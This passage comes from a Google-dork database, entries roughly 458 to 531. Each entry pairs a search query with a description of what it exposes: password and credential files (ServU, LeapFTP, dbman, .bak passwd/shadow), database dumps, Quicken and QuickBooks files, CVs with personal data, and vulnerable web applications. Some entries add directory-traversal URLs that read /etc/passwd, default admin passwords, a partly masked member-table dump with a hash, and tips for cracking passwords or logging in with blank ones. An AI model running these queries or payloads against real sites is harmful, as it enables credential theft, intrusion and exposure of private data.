to find the results of this software.
[descr]]
[[url]http://www.google.com/search?num=100&&q=%22AutoCreate%3DTRUE+password%3D*%22[url]]
[[dork]"AutoCreate=TRUE password=*"[dork]]
[end][458]]
[[start][459]
[[title]intext:"d.aspx?id" || inurl:"d.aspx?id"[title]]
[[descr]"The YouSendIt team was formed to tackle a common problem: secure transmission of large documents online without the use of clumsy client software, mail servers with limited storage space, and sharing passwords. By eliminating the size constraints and security risks of sending files by email, YouSendIt has turned the most common form of communication on the Internet into the best method of secure document transimssion."
This search shows the files that were transmitted. A malicious user could download them from these pages. This company tends to hold the users responsible for content, while at the same time exposing their pages to Google.. way to go guys..[descr]]
[[url]http://www.google.com/search?q=intext%3A%22d.aspx%3Fid%22+%7C%7C+inurl%3A%22d.aspx%3Fid%22[url]]
[[dork]intext:"d.aspx?id" || inurl:"d.aspx?id"[dork]]
[end][459]]
[[start][461]
[[title]filetype:pass pass intext:userid[[title]]
[[descr]Generally, these are dbman password files. They are not cleartext, but still allow an attacker to harvest usernames and optionally crack passwords offline.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Apass+pass+intext%3Auserid&btnG=Search[url]]
[[dork]filetype:pass pass intext:userid[dork]]
[end][461]]
[[start][462]
[[title]inurl:/cgi-bin/sqwebmail?noframes=1[[title]]
[[descr]SQWebmail login portals.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3A%2Fcgi-bin%2Fsqwebmail%3Fnoframes%3D1&btnG=Search[url]]
[[dork]inurl:/cgi-bin/sqwebmail?noframes=1[dork]]
[end][462]]
[[start][463]
[[title]filetype:ini ServUDaemon[[title]]
[[descr]The servU FTP Daemon ini file contains setting and session information including usernames, passwords and more. [descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Aini+ServUDaemon&btnG=Search[url]]
[[dork]filetype:ini ServUDaemon[dork]]
[end][463]]
[[start][465]
[[title]inurl:comersus_message.asp[[title]]
[[descr]About Comercus: "Comersus is an active server pages software for running a professional store, seamlessly integrated with the rest of your web site. Comersus Cart is free and it can be used for commercial purposes. Full source code included and compatible with Windows and Linux Servers."
Comersus Open Technologies Comersus Cart has Multiple Vulnerabilities: http://www.securityfocus.com/bid/10674/info/
This search finds the XSS vulnerable file comersus_message.asp?message= ..
No version info is included with the search. Not all results are vulnerable.
[descr]]
[[url]http://www.google.com/search?q=inurl%3Acomersus_message.asp[url]]
[[dork]inurl:comersus_message.asp[dork]]
[end][465]]
[[start][466]
[[title]intitle:"teamspeak server-administration[[title]]
[[descr]TeamSpeak is an application which allows its users to talk to each other over the internet and basically was designed to run in the background of online games. TeamSpeak uses a webadmin login portal to change server settings remotely. Usually not an issue, however it might be when someone lets google pick up their portal.
[descr]]
[[url]http://www.google.com/search?q=intitle%3A%22teamspeak+server-administration[url]]
[[dork]intitle:"teamspeak server-administration[dork]]
[end][466]]
[[start][467]
[[title]ext:pl inurl:cgi intitle:"FormMail *" -"*Referrer" -"* Denied" -sourceforge -error -cvs -input[[title]]
[[descr]FormMail is a Perl script written by Matt Wright to send mail with sendmail from the cgi-gateway. Early version didn' have a referer check. New versions could be misconfigured.
Spammers are known to hunt them down (by means of cgi-scanning) and abuse them for their own evil purposes if the admin forgot to check the settings.
http://www.securityfocus.com/bid/3954/discussion/[descr]]
[[url]http://www.google.com/search?num=100&q=ext%3Apl+inurl%3Acgi+intitle%3A%22FormMail+*%22++-%22*Referrer%22+-%22*+Denied%22+-sourceforge+-error+-cvs+-input[url]]
[[dork]ext:pl inurl:cgi intitle:"FormMail *" -"*Referrer" -"* Denied" -sourceforge -error -cvs -input[dork]]
[end][467]]
[[start][468]
[[title](inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt[[title]]
[[descr]Webmasters wanting to exclude search engine robots from certain parts of their site often choose the use of a robot.txt file on the root of the server. This file basicly tells the bot which directories are supposed to be off-limits.
An attacker can easily obtain that information by very simply opening that plain text file in his browser. Webmasters should *never* rely on this for real security issues. Google helps the attacker by allowing a search for the "disallow" keyword.[descr]]
[[url]http://www.google.com/search?num=100&q=%28inurl%3A%22robot.txt%22+%7C+inurl%3A%22robots.txt%22+%29+intext%3Adisallow+filetype%3Atxt[url]]
[[dork](inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt[dork]]
[end][468]]
[[start][469]
[[title]intext:"Session Start * * * *:*:* *" filetype:log[[title]]
[[descr]These are IRC and a few AIM log files. They may contain juicy info or just hours of good clean newbie bashing fun.[descr]]
[[url]http://www.google.com/search?q=intext:%22Session+Start+*+*+*+*:*:*+*%22+filetype:log&num=100[url]]
[[dork]intext:"Session Start * * * *:*:* *" filetype:log[dork]]
[end][469]]
[[start][470]
[[title]"WebSTAR Mail - Please Log In"[title]]
[[descr]@stake, Inc. advisory: "4D WebSTAR is a software product that provides Web, FTP, and Mail services for Mac OS X. There are numerous vulnerabilities that allow for an attacker to escalate privileges or obtain access to protected resources."
See also: http://www.securityfocus.com/archive/1/368778[descr]]
[[url]http://www.google.com/search?q=%22WebSTAR+Mail+-+Please+Log+In%22[url]]
[[dork]"WebSTAR Mail - Please Log In"[dork]]
[end][470]]
[[start][471]
[[title]Ultima Online loginservers[[title]]
[[descr]This one finds login servers for the Ultima Online game. [descr]]
[[url]http://www.google.com/search?q=filetype%3Acfg+login+%22LoginServer%3D%22[url]]
[[dork]filetype:cfg login "LoginServer="[dork]]
[end][471]]
[[start][473]
[[title]mail filetype:csv -site:gov intext:name[[title]]
[[descr]CSV Exported mail (user) names and such.[descr]]
[[url]http://www.google.com/search?q=mail+filetype%3Acsv+-site%3Agov+intext%3Aname[url]]
[[dork]mail filetype:csv -site:gov intext:name[dork]]
[end][473]]
[[start][474]
[[title]filetype:xls -site:gov inurl:contact[[title]]
[[descr]Microsoft Excel sheets containing contact information.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Axls+-site%3Agov+inurl%3Acontact&btnG=Search[url]]
[[dork]filetype:xls -site:gov inurl:contact[dork]]
[end][474]]
[[start][475]
[[title]"images in this album on"[title]]
[[descr]Reveals personal photo albums which can be useful for SE jobs.[descr]]
[[url]http://www.google.com/search?hl=en&ie=UTF-8&q=%22images+in+this+album+on%22&btnG=Google+Search[url]]
[[dork]"images in this album on"[dork]]
[end][475]]
[[start][476]
[[title]inurl:nuke filetype:sql[[title]]
[[descr]This search reveals database dumps that most likely relate to the php-nuke or postnuke content management systems. These database dumps contain usernames and (sometimes) encrypted passwords for users of the system.[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Anuke+filetype%3Asql&btnG=Search[url]]
[[dork]inurl:nuke filetype:sql[dork]]
[end][476]]
[[start][477]
[[title]intitle:"please login" "your password is *"[title]]
[[descr]These administrators were friendly enough to give hints about the password.[descr]]
[[url]http://www.google.com/search?num=50&q=intitle%3A%22please+login%22+%22your+password+is+*%22[url]]
[[dork]intitle:"please login" "your password is *"[dork]]
[end][477]]
[[start][478]
[[title]intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -Forums[[title]]
[[descr]OsCommerce has some security issues, including the following warning message: "Warning: I am able to write to the configuration file". Additional information on this can be found at http://www.fluxforums.com/showthread.php?p=14883#post14883
With this search an attacker can find vulnerable OsCommerce servers and can build his attack from there.[descr]]
[[url]http://www.google.com/search?q=intext:%22Warning:+*+am+able+*+write+**+configuration+file%22+%22includes/configure.php%22+-Forums&num=100&hl=en&lr=&ie=UTF-8&safe=off&start=0&sa=N[url]]
[[dork]intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -Forums[dork]]
[end][478]]
[[start][484]
[[title]inurl:/db/main.mdb[[title]]
[[descr]ASP-Nuke database file containing passwords.
This search goes for the direct location and has few results. For more hits an attacker would try to find ASP-Nuke sites another way (search googledorks for them) and change the URL to the database location.[descr]]
[[url]http://www.google.com/search?q=inurl%3A%2Fdb%2Fmain.mdb[url]]
[[dork]inurl:/db/main.mdb[dork]]
[end][484]]
[[start][485]
[[title]inurl:cgi-bin/ultimatebb.cgi?ubb=login[[title]]
[[descr]These are login pages for Infopop's message board UBB.classic. For the UBB.threads you can use this search
This next search finds all UBB pages with the infopop image and a link to the developers.
http://www.google.com/search?num=100&&safe=off&q=link%3Ahttp%3A%2F%2Fwww.infopop.com%2Flanding%2Fgoto.php%3Fa%3Dubb.classic&filter=1[descr]]
[[url]http://www.google.com/search?num=100&&safe=off&q=link%3Ahttp%3A%2F%2Fwww.infopop.com%2Flanding%2Fgoto.php%3Fa%3Dubb.classic&filter=1
Click here for the Google search ==>
This searches pathto.asp files and allows an attacker to know the exact installed path of the software.
Examples:
The path to your Site is -- g:\0E5\goldenstateeng.xxx\web
The path to your Site is -- D:\inetpub\wwwroot\01xx738\mc10s9izz
[descr]]
[[url]http://www.google.com/search?q=ext%3Aasp+inurl%3Apathto.asp[url]]
[[dork]ext:asp inurl:pathto.asp[dork]]
[end][486]]
[[start][487]
[[title]ext:cgi inurl:ubb6_test[[title]]
[[descr]The UBB trial version contains files that are not safe to keep online after going live. The install files clearly state so:
CAUTIONS Do not leave pathto.asp or ubb6_test.cgi on your server. Delete them from the server when you are done. Leaving them in place poses a security risk."
This is the UBB6 Permissions & Paths Diagnostic Script.
Example:
UBB Version 6.1.0.3
Perl Version 5.006
Server Type Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.10 mod_jk/1.2.0 mod_perl/1.24_01 PHP/4.2.2 FrontPage/5.0.2 mod_ssl/2.8.12 OpenSSL/0.9.6b
check path:
1. check permission to write new files in this directory
2. check for the 'required' files in both the CGI and this directory
3. check my read/write permissions on all the variables files
4. check my absolute paths in general settings if available
version 2.1 © 2001 Infopop Corporation All Rights Reserved[descr]]
[[url]http://www.google.com/search?q=ext%3Acgi+inurl%3Aubb6_test.cgi[url]]
[[dork]ext:cgi inurl:ubb6_test.cgi[dork]]
[end][487]]
[[start][488]
[[title]"this proxy is working fine!" "enter *" "URL***" * visit[[title]]
[[descr]These are test pages for some proxy program. Some have a text field that allows you to use that page as a proxy.
The experts comment on this is there are much better solutions for surfing anonymously. [descr]]
[[url]http://www.google.com/search?q=%22this+proxy+is+working+fine!%22+%22enter+*%22+%22URL***%22+*+visit&num=100&filter=0[url]]
[[dork]"this proxy is working fine!" "enter *" "URL***" * visit[dork]]
[end][488]]
[[start][489]
[[title]PassMaster cleartext passwords[[title]]
[[descr]The site javafile.com has several password "protection" solutions, see hxxp://www.javafile.com/password.php (url xx'd). This search exposes the "PassMaster" product passwords. It's so easy you should never consider this product for anything serious.
An attacker can use this to read the cleartext passwords which are not protected in any way from viewing.
[descr]]
[[url]http://www.google.com/search?num=100&q=ext%3Alog+password+END_FILE[url]]
[[dork]ext:log password END_FILE[dork]]
[end][489]]
[[start][491]
[[title]"http://*:*@www" domainname[[title]]
[[descr]This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net
"http://*:*@www" bangbus or "http://*:*@www"bangbus
Another way is by just typing
"http://bob:bob@www"descr]]
[[url]http://www.google.com/search?safe=off&q=%22http%3A%2F%2F*%3A*%40www%22+bob%3Abob&num=100[url]]
[[dork]"http://*:*@www" bob:bob[dork]]
[end][491]]
[[start][492]
[[title]filetype:bak inurl:"htaccess|passwd|shadow|htusers"[title]]
[[descr]This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).
Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.[descr]]
[[url]http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Abak+inurl%3A%22htaccess%7Cpasswd%7Cshadow%7Chtusers%22&filter=0[url]]
[[dork]filetype:bak inurl:"htaccess|passwd|shadow|htusers"[dork]]
[end][492]]
[[start][493]
[[title]filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"[title]]
[[descr]This search will show an attacker some PHP error logs wich may contain information on wich an attack can be based.[descr]]
[[url]http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Alog+%22PHP+Parse+error%22+%7C+%22PHP+Warning%22+%7C+%22PHP+Error%22[url]]
[[dork]filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"[dork]]
[end][493]]
[[start][494]
[[title]"powered by CuteNews" "2003..2005 CutePHP"[title]]
[[descr]This finds sites powered by various CuteNews versions. An attacker use this list and search the online advisories for vulnerabilities.
For example: "CuteNews HTML Injection Vulnerability Via Commentaries", Vulnerable Systems: * CuteNews version 1.3.x (http://www.securiteam.com/unixfocus/5BP0N20DFA.html)
[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22powered+by+CuteNews%22+%222003..2005+CutePHP%22&btnG=Search[url]]
[[dork]"powered by CuteNews" "2003..2005 CutePHP"[dork]]
[end][494]]
[[start][496]
[[title]intext:"404 Object Not Found" Microsoft-IIS/5.0[[title]]
[[descr]This search finds IIS 5.0 error pages = IIS 5.0 Server[descr]]
[[url]http://www.google.com/search?q=intext%3A%22404+Object+Not+Found%22+Microsoft-IIS%2F5.0[url]]
[[dork]intext:"404 Object Not Found" Microsoft-IIS/5.0[dork]]
[end][496]]
[[start][497]
[[title]filetype:conf oekakibbs[[title]]
[[descr]Oekakibss is a japanese anime creation application. The config file tells an attacker the encrypted password. [descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aconf+oekakibbs+&btnG=Search[url]]
[[dork]filetype:conf oekakibbs [dork]]
[end][497]]
[[start][498]
[[title]Novell NetWare intext:"netware management portal version"[title]]
[[descr]Netware servers ( v5 and up ) use a web-based management utility called Portal services, which can be used to view files on a volume, view server health statistics, etc. While you must log into the Portal Manager to view any of the data, it will accept blank passwords. So any Netware username defined in the server's NDS database w/o a password can authenticate.
After the Google results are displayed, an attacker wil go to the company base web url and learn about employees, preferably their email addresses. Then bounce to the portal management login and try their username w/o a password.[descr]]
[[url]http://www.google.com/search?num=100&&q=Novell+NetWare+intext%3A%22netware+management+portal+version%22[url]]
[[dork]Novell NetWare intext:"netware management portal version"[dork]]
[end][498]]
[[start][499]
[[title]Achievo webbased project management[[title]]
[[descr]Achievo is a free web-based project management tool for business-environments. Achievo's is mainly used for its project management capabilities. According to the site securitytracker.com remote code execution is possible by modifying a certain php script in this software suite.
More information is available at: http://www.securitytracker.com/alerts/2002/Aug/1005121.html[descr]]
[[url]http://www.google.com/search?q=inurl:%22dispatch.php%3Fatknodetype%22+%7C++inurl:class.atkdateattribute.js.php&num=100&filter=0[url]]
[[dork]inurl:"dispatch.php?atknodetype" | inurl:class.atkdateattribute.js.php[dork]]
[end][499]]
[[start][500]
[[title]intitle:"PHP Explorer" ext:php (inurl:phpexplorer.php | inurl:list.php | inurl:browse.php)[[title]]
[[descr]This searches for PHP Explorer scripts. This looks like a file manager with some nice extra options for an attacker, such as phpinfo, create/list directories and execute command shell. Not many results in this search and some only cached. Over time this may prove to be interesting if Google finds more (or someone finds a better search method for them).[descr]]
[[url]http://www.google.com/search?num=100&q=intitle%3A%22PHP+Explorer%22+ext%3Aphp+%28inurl%3Aphpexplorer.php+%7C++inurl%3Alist.php+%7C+inurl%3Abrowse.php%29[url]]
[[dork]intitle:"PHP Explorer" ext:php (inurl:phpexplorer.php | inurl:list.php | inurl:browse.php)[dork]]
[end][500]]
[[start][501]
[[title]"ftp://" "www.eastgame.net"[title]]
[[descr]Use this search to find eastgame.net ftp servers, loads of warez and that sort of thing.
"thankyou4share" ![descr]]
[[url]http://www.google.com/search?hl=en&ie=UTF-8&q=%22ftp%3A%2F%2F%22+%22www.eastgame.net%22+&btnG=Google+Search[url]]
[[dork]"ftp://" "www.eastgame.net" [dork]]
[end][501]]
[[start][503]
[[title]intitle:"ITS System Information" "Please log on to the SAP System"[title]]
[[descr]Frontend for SAP Internet Transaction Server webgui service. [descr]]
[[url]http://www.google.com/search?num=100&q=intitle%3A%22ITS+System+Information%22+%22Please+log+on+to+the+SAP+System%22[url]]
[[dork]intitle:"ITS System Information" "Please log on to the SAP System"[dork]]
[end][503]]
[[start][504]
[[title]Login ("Powered by Jetbox One CMS ™" | "Powered by Jetstream © *")[[title]]
[[descr]Jetbox is a content management systems (CMS) that uses MySQL or equivalent databases. There is a vulnerability report at SF wich I think is overrated, but I will mention here:
http://www.securityfocus.com/bid/10858/discussion/
The file holding the password is called: "http://.../includes/general_settings.inc.php"
It does come with default passwords and that is allways a security risk. The administration is available via /admin/
Username: admin, Password: admin1 .[descr]]
[[url]http://www.google.com/search?q=Login+(%22Powered+by+Jetbox+One+CMS+%E2%84%A2%22+%7C+%22Powered+by+Jetstream+%C2%A9+*%22)&num=100&hl=en&lr=&ie=UTF-8&safe=off&filter=0[url]]
[[dork]Login ("Powered by Jetbox One CMS ™" | "Powered by Jetstream © *")[dork]]
[end][504]]
[[start][505]
[[title]LeapFTP intitle:"index.of./" sites.ini modified[[title]]
[[descr]The LeapFTP client configuration file "sites.ini" holds the login credentials for those sites in plain text. The passwords seems to be encrypted.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=LeapFTP+intitle%3A%22index.of.%2F%22+sites.ini+modified&btnG=Search[url]]
[[dork]LeapFTP intitle:"index.of./" sites.ini modified[dork]]
[end][505]]
[[start][506]
[[title]intitle:Login * Webmailer[[title]]
[[descr]1&1 Webmail login portals. This is made by a german company called Internet United active in the hosting providers area.
They have a server login product wich can be found by Googling
This is all not very exiting as there have been no vulnerabilities reported on this software yet.[descr]]
[[url]http://www.google.com/search?hl=en&ie=UTF-8&q=intitle%3ALogin+1%261+Webmailer&btnG=Google+Search[url]]
[[dork]intitle:Login 1&1 Webmailer[dork]]
[end][506]]
[[start][507]
[[title]inurl:"gs/adminlogin.aspx"[title]]
[[descr]GradeSpeed seems to be a .NET application to administer school results for several schools using the web. If you do not select a school an error is reported. The HTML source code shows path information, for example:
option value="E:\GRADESPEED\DRHARMONWKELLEYELEMENTARY\|Dr H. W K. E.|101">Dr ...
[descr]]
[[url]http://www.google.com/search?q=inurl%3A%22gs%2Fadminlogin.aspx%22[url]]
[[dork]inurl:"gs/adminlogin.aspx"[dork]]
[end][507]]
[[start][508]
[[title]"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"[title]]
[[descr]This search gives hounderd of existing curriculum vitae with names and adress. An attacker could steal identity if there is an SSN in the document.[descr]]
[[url]http://www.google.com/search?q=%22phone++*+*+*%22+%22address+*%22+%22e-mail%22+intitle:%22curriculum+vitae%22[url]]
[[dork]"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"[dork]]
[end][508]]
[[start][509]
[[title]intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"[title]]
[[descr]Search to show online Novell Groupwise web access portals. [descr]]
[[url]http://www.google.com/search?q=intitle:Novell+WebAccess&ie=UTF-8&oe=UTF-8intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"url]]
[[dork]intitle:Novell WebAccess[dork]]
[end][509]]
[[start][510]
[[title]intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"[title]]
[[descr]Search for phpMyAdmin installations that are configured to run the MySQL database with root priviledges. [descr]]
[[url]http://www.google.com/search?num=100&q=intitle%3AphpMyAdmin+%22Welcome+to+phpMyAdmin+***%22+%22running+on+*+as+root%40*%22[url]]
[[dork]intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"[dork]]
[end][510]]
[[start][512]
[[title]"Powered by Gallery v1.4.4"[title]]
[[descr]http://www.securityfocus.com/bid/10968/discussion/
"A vulnerability is reported to exist in Gallery that may allow a remote attacker to execute malicious scripts on a vulnerable system. This issue is a design error that occurs due to the 'set_time_limit' function.
The issue presents itself because the 'set_time_limit' function forces the application to wait for 30-seconds before the verification and discarding of non-image files takes place. This allows for a window of opportunity for an attacker to execute a malicious script on a server.
Gallery 1.4.4 is reported prone to this issue, however, other versions may be affected as well. "descr]]
[[url]http://www.google.com/search?hl=en&ie=UTF-8&q=%22Powered+by+Gallery+v1.4.4%22[url]]
[[dork]"Powered by Gallery v1.4.4"[dork]]
[end][512]]
[[start][513]
[[title]Quicken data files[[title]]
[[descr]The QDATA.QDF file (found sometimes in zipped "QDATA" archives online, sometimes not) contains financial data, including banking accounts, credit card numbers, etc.
This search has only a couple hits so far, but this should be popular in the coming year as Quicken 2005 makes it very easy and suggests to backup your data online. [descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3AQDF+QDF[url]]
[[dork]filetype:QDF QDF[dork]]
[end][513]]
[[start][514]
[[title]"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"[title]]
[[descr]This search reveals Postgresql servers in yet another way then we had seen before. Path information appears in the error message and sometimes database names.[descr]]
[[url]http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Warning%3A+pg_connect%28%29%3A+Unable+to+connect+to+PostgreSQL+server%3A+FATAL%22[url]]
[[dork]"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"[dork]]
[end][514]]
[[start][515]
[[title]filetype:ini wcx_ftp[[title]]
[[descr]This searches for Total commander FTP passwords (encrypted) in a file called wcx_ftp.ini. Only 6 hits at the moment, but there may be more in the future.[descr]]
[[url]http://www.google.com/search?hl=en&q=filetype%3Aini+wcx_ftp[url]]
[[dork]filetype:ini wcx_ftp[dork]]
[end][515]]
[[start][517]
[[title]4images Administration Control Panel[[title]]
[[descr]4images Gallery - 4images is a web-based image gallery management system. The 4images administration control panel let you easily modify your galleries.[descr]]
[[url]http://www.google.com/search?&q=%224images+Administration+Control+Panel%22[url]]
[[dork]"4images Administration Control Panel"[dork]]
[end][517]]
[[start][518]
[[title]intitle:index.of /AlbumArt_[[title]]
[[descr]Directories containing commercial music.
AlbumArt_{.*}.jpg are download/create by MS-Windows Media Player in music directory.[descr]]
[[url]http://www.google.com/search?hl=de&ie=ISO-8859-1&q=intitle%3Aindex.of+%2FAlbumArt_&btnG=Google-Suche&meta=[url]]
[[dork]intitle:index.of /AlbumArt_[dork]]
[end][518]]
[[start][519]
[[title]inurl:robpoll.cgi filetype:cgi[[title]]
[[descr]robpoll.cgi is used to administrate polls.
The default password used for adding polls is 'robpoll'. All of the results should look something like this: "http://www.example.com/robpoll.cgi?start". An attacker may change robpoll.cgi pointing to admin like this: "http://www.example.com/robpoll.cgi?admin".
[descr]]
[[url]http://www.google.com/search?hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Arobpoll.cgi+filetype%3Acgi&btnG=Search[url]]
[[dork]inurl:robpoll.cgi filetype:cgi[dork]]
[end][519]]
[[start][520]
[[title]( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject[[title]]
[[descr]storing emails in your webtree isnt a good idea.
with this search google will show files containing emails like mail,eml,mbox or mbx with the keywords
"password" or "subject" in the mail data.
[descr]]
[[url]http://www.google.com/search?hl=de&ie=ISO-8859-1&q=%28+filetype%3Amail+%7C+filetype%3Aeml+%7C+filetype%3Ambox+%7C+filetype%3Ambx+%29+intext%3Apassword%7Csubject+&btnG=Google-Suche&meta=[url]]
[[dork]( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject [dork]]
[end][520]]
[[start][521]
[[title]filetype:qbb qbb[[title]]
[[descr]This search will show QuickBooks Bakup Files. Quickbook is financial accounting software so storing these files in a webtree is not a smart idea.
[descr]]
[[url]http://www.google.com/search?&q=filetype%3Aqbb+qbb[url]]
[[dork]filetype:qbb qbb[dork]]
[end][521]]
[[start][522]
[[title]filetype:bkf bkf[[title]]
[[descr]This search will show backupfiles for xp/2000 machines.
Of course these files could contain nearly everything, depending on the user selection and they can also be password protected.
[descr]]
[[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=filetype%3Abkf+bkf&meta=[url]]
[[dork]filetype:bkf bkf[dork]]
[end][522]]
[[start][523]
[[title]inurl:"plog/register.php"[title]]
[[descr]pLog is a popular form of bloggin software. Currently there are estimated about 1450 sites running it. The installation documents clearly warn about removing files after installation for security purposes:
"If you are not planning to allow internet users to create new blogs in this server, then you should also remove register.php."
This search finds that register.php form of course :)
Below is some more general information about pLog.
Vendor site: hxxp://www.plogworld.org/
Admin portals http://sitename/plog/admin.php
Installation wizard: http://sitename/plog/wizard.php
Config file (mysql db pass): http://sitename/plog/config/config.properties.php
Temp files: http://sitename/plog/tmp/
Gallery files: http://sitename/plog/gallery/
Blog search engine: http://www.plogworld.org/ploogle/[descr]]
[[url]http://www.google.com/search?q=inurl%3A%22plog%2Fregister.php%22[url]]
[[dork]inurl:"plog/register.php"[dork]]
[end][523]]
[[start][524]
[[title]link:http://www.toastforums.com/[[title]]
[[descr]Toast Forums is an ASP message board on the Internet. Toast Forums also has all the features of an advanced message board (see hxxp://www.toastforums.com/). The problem is in the install documentation (quoting):
-- start quote --
2. Rename the data.mdb file to a different name. After renaming the data.mdb file, open constants.asp and change the tstDBConnectString constant to reflect the new name.
-- end quote --
This search finds sites running Toast Forum by using the LINK: operator. Trial and error is needed to find the database file from the results by changing the URL. Member data can be found in the table "tstdb_Member". It looks like this:
"ID" "FName" "LName" "Username" "Password" "Email" "HideEmail" "ICQ" "Homepage" "Signature" "IP" "Skin" "IncludeSignature" "NotifyDefault" "PostCount" "LastLoginDate" "LastPostDate"
Passwords are encrypted with the RC4 algoritm, so an attacker would find cracking them is (more) difficult (than usual).
[descr]]
[[url]http://www.google.com/search?hl=en&ie=UTF-8&q=link%3Ahttp%3A%2F%2Fwww.toastforums.com%2F&btnG=Google+Search[url]]
[[dork]link:http://www.toastforums.com/[dork]]
[end][524]]
[[start][525]
[[title]Snitz! forums db path error[[title]]
[[descr]Snitz forums uses a microsoft access databases for storage and the default name is "Snitz_forums_2000.mdb". The installation recommends changing both the name and the path. If only one is changed this database error occurs.
An attacker may use this information as a hint to the location and the changed name for the database, thus rendering the forum vulnerable to hostile downloads.[descr]]
[[url]http://www.google.com/search?q=databasetype.+Code+:+80004005.+Error+Description+:&num=100&hl=en&lr=&ie=UTF-8&safe=off&start=0&sa=N[url]]
[[dork]databasetype. Code : 80004005. Error Description :[dork]]
[end][525]]
[[start][526]
[[title]"Powered by Ikonboard 3.1.1"[title]]
[[descr]IkonBoard (http://www.ikonboard.com/) is a comprehensive web bulletin board system, implemented as a Perl/CGI script.
There is a flaw in the Perl code that cleans up user input before interpolating it into a string which gets passed to Perl's eval() function, allowing an attacker to evaluate arbitrary Perl and hence run arbitrary commands.
More info at: http://www.securitytracker.com/alerts/2003/Apr/1006446.html
The bug was fixed in 3.1.2.[descr]]
[[url]http://www.google.com/search?hl=en&ie=UTF-8&q=%22Powered+by+Ikonboard+3.1.1%22[url]]
[[dork]"Powered by Ikonboard 3.1.1"[dork]]
[end][526]]
[[start][527]
[[title]inurl:snitz_forums_2000.mdb[[title]]
[[descr]The SnitzTM Forums 2000 Version 3.4.04 Installation Guide and Readme says: "it is strongly recommended that you change the default database name from snitz_forums_2000.mdb to a cryptic or not easy to guess name."
Of course, we know readme's are for lamers.. right admins ?
[murfie@forofo googledorks]$ mdb-export snitz_forums_2000.mdb FORUM_MEMBERS
MEMBER_ID,M_STATUS,M_NAME,M_USERNAME,M_PASSWORD,M_EMAIL, [etc]
1,1,"adminadmin","58180bb12beb55a4bffbxxde75cxxc53dcc8061c3cdee52e0ebdcd74049d374e","yourmail@server.com"," "," ","","",1,1,1,3," "," "," ","20030918120147",2,"20030918120207","20030918120224","Forum Admin","10.xx.xx.72",0,0,1,"000.000.000.000","","","","","","","","","","",""," "," ","",""," ","","","","",1
(data xx'd at some points)
The password hash value is a SHA256 encoded string (with no salting). Every attacker knows they can be broken with a dictionary attack using a very simpel perl or C program.
http://murfnet.xs4all.nl/public/scripts/perl/desnitz.txt[descr]]
[[url]http://www.google.com/search?q=inurl%3Asnitz_forums_2000.mdb[url]]
[[dork]inurl:snitz_forums_2000.mdb[dork]]
[end][527]]
[[start][528]
[[title]WebAPP directory traversal[[title]]
[[descr]WebAPP is advertised as the internet's most feature rich, easy to run PERL based portal system. The WebAPP system has a serious reverse directory traversal vulnerability
http:///cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00
http:///cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00
Detailed info : http://www.packetstormsecurity.com/0408-exploits/webapp.traversal.txt
Credits goes to PhTeam for discovering this vulnerability.[descr]]
[[url]http://www.google.com/search?num=100&q=inurl%3A%2Fcgi-bin%2Findex.cgi+inurl%3Atopics+inurl%3Aviewcat%3D+%2Bintext%3A%22WebAPP%22+-site%3Aweb-app.org[url]]
[[dork]inurl:/cgi-bin/index.cgi inurl:topics inurl:viewcat= +intext:"WebAPP" -site:web-app.org[dork]]
[end][528]]
[[start][529]
[[title]filetype:rdp rdp[[title]]
[[descr]These are Remote Desktop Connection (rdp) files. They contain the settings and sometimes the credentials to connect to another windows computer using the RDP protocols.[descr]]
[[url]http://www.google.com/search?q=filetype%3Ardp+rdp[url]]
[[dork]filetype:rdp rdp[dork]]
[end][529]]
[[start][530]
[[title]filetype:reg "Terminal Server Client"[title]]
[[descr]These are Microsoft Terminal Services connection settings registry files. They may sometimes contain encrypted passwords and IP addresses. [descr]]
[[url]http://www.google.com/search?q=filetype%3Areg+%22Terminal+Server+Client%22[url]]
[[dork]filetype:reg "Terminal Server Client"[dork]]
[end][530]]
[[start][531]
[[title]inurl:"nph-proxy.cgi" "Start browsing through this CGI-based proxy"[title]]
[[descr]Observing the web cracker in the wild, one feels like they are watching a bear. Like a bear stocks up on food and then hibernates, a web cracker must stock up on proxies, and then hack until they run out.
